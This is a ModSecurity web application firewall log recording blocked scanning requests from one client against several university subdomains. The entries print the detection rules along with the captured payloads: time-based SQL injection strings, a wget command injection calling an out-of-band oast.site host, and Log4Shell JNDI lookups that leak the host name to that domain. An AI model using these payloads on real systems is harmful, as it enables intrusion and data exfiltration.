[Tue Aug 29 11:30:23.320515 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlgu4xjcfpu8r37i.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/Collector/diagnostics/ping"] [unique_id "ZO10X8Co-f0AAAPPSuQAAAAd"]
[Tue Aug 29 11:30:23.324498 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:email: 1' or sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/forgot_password.php"] [unique_id "ZO10X8Co-f0AAAPMl@wAAAAY"]
[Tue Aug 29 11:30:23.327261 2023] [:error] [pid 966] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/account/index.php"] [unique_id "ZO10X8Co-f0AAAPGfrsAAAAV"]
[Tue Aug 29 11:30:23.339810 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:email: 1' or sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/forgot_password.php"] [unique_id "ZO10X8Co-f0AAAPPSuUAAAAd"]
[Tue Aug 29 11:30:23.348413 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:email: 1' or sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/forgot_password.php"] [unique_id "ZO10X8Co-f0AAAPMl@0AAAAY"]
[Tue Aug 29 11:30:23.348655 2023] [:error] [pid 904] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/account/index.php"] [unique_id "ZO10X8Co-f0AAAOIvTgAAAAM"]
[Tue Aug 29 11:30:23.348837 2023] [:error] [pid 966] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/account/index.php"] [unique_id "ZO10X8Co-f0AAAPGfrwAAAAV"]
[Tue Aug 29 11:30:23.350410 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:email: 1' or sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/forgot_password.php"] [unique_id "ZO10X8Co-f0AAAPENb8AAAAQ"]
[Tue Aug 29 11:30:23.351576 2023] [:error] [pid 902] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/account/index.php"] [unique_id "ZO10X8Co-f0AAAOGafYAAAAS"]
[Tue Aug 29 11:30:23.357936 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:email: 1' or sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/forgot_password.php"] [unique_id "ZO10X8Co-f0AAAPXAkkAAAAi"]
[Tue Aug 29 11:30:23.361157 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/account/index.php"] [unique_id "ZO10X8Co-f0AAAN5YIQAAAAN"]
[Tue Aug 29 11:30:24.323583 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/opensis/index.php"] [unique_id "ZO10YMCo-f0AAAPENcAAAAAQ"]
[Tue Aug 29 11:30:24.325206 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/opensis/index.php"] [unique_id "ZO10YMCo-f0AAAPXAkoAAAAi"]
[Tue Aug 29 11:30:24.337681 2023] [:error] [pid 966] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:email: 1' or sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/forgot_password.php"] [unique_id "ZO10YMCo-f0AAAPGfr0AAAAV"]
[Tue Aug 29 11:30:24.339881 2023] [:error] [pid 867] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlgg6bofyxuoiegd.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/Collector/diagnostics/ping"] [unique_id "ZO10YMCo-f0AAANjpxIAAAAT"]
[Tue Aug 29 11:30:24.341694 2023] [:error] [pid 973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: 1 AND (SELECT 1626 FROM (SELECT(SLEEP(6)))niPH)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10YMCo-f0AAAPNBRQAAAAZ"]
[Tue Aug 29 11:30:24.343187 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: 1 AND (SELECT 1626 FROM (SELECT(SLEEP(6)))niPH)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10YMCo-f0AAAOH4SQAAAAH"]
[Tue Aug 29 11:30:24.348985 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/opensis/index.php"] [unique_id "ZO10YMCo-f0AAAPXAksAAAAi"]
[Tue Aug 29 11:30:24.351477 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: 1 AND (SELECT 1626 FROM (SELECT(SLEEP(6)))niPH)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10YMCo-f0AAAOOuTwAAAAW"]
[Tue Aug 29 11:30:24.352630 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/opensis/index.php"] [unique_id "ZO10YMCo-f0AAAOM4VkAAAAU"]
[Tue Aug 29 11:30:24.352843 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: 1 AND (SELECT 1626 FROM (SELECT(SLEEP(6)))niPH)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10YMCo-f0AAAPPSugAAAAd"]
[Tue Aug 29 11:30:24.375977 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/opensis/index.php"] [unique_id "ZO10YMCo-f0AAAOM4VoAAAAU"]
[Tue Aug 29 11:30:24.376761 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: 1 AND (SELECT 1626 FROM (SELECT(SLEEP(6)))niPH)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10YMCo-f0AAAOOuT0AAAAW"]
[Tue Aug 29 11:30:25.312501 2023] [:error] [pid 902] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10YcCo-f0AAAOGafgAAAAS"]
[Tue Aug 29 11:30:25.335960 2023] [:error] [pid 959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10YcCo-f0AAAO-1owAAAAI"]
[Tue Aug 29 11:30:25.336584 2023] [:error] [pid 991] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-239}${:-529}.${hostName}.username.cjmn8l5jmimk2adbbnlgx4kerasusrmn7.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO10YcCo-f0AAAPfm7YAAAAR"]
[Tue Aug 29 11:30:25.341559 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10YcCo-f0AAAO874sAAAAF"]
[Tue Aug 29 11:30:25.386899 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-239}${:-529}.${hostName}.username.cjmn8l5jmimk2adbbnlg4kjii5fdxg18c.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO10YcCo-f0AAAOM4VwAAAAU"]
[Tue Aug 29 11:30:25.408248 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-239}${:-529}.${hostName}.username.cjmn8l5jmimk2adbbnlgb9o874xapmca3.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO10YcCo-f0AAAPENcUAAAAQ"]
[Tue Aug 29 11:30:25.408301 2023] [:error] [pid 902] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-239}${:-529}.${hostName}.username.cjmn8l5jmimk2adbbnlgytxay8umbpn86.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO10YcCo-f0AAAOGafoAAAAS"]
[Tue Aug 29 11:30:25.409937 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-239}${:-529}.${hostName}.username.cjmn8l5jmimk2adbbnlg5yqawqfassp76.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO10YcCo-f0AAAOM4V0AAAAU"]
[Tue Aug 29 11:30:25.420184 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO10YcCo-f0AAAPXAk0AAAAi"]
[Tue Aug 29 11:30:25.537106 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10YcCo-f0AAAOM4V4AAAAU"]
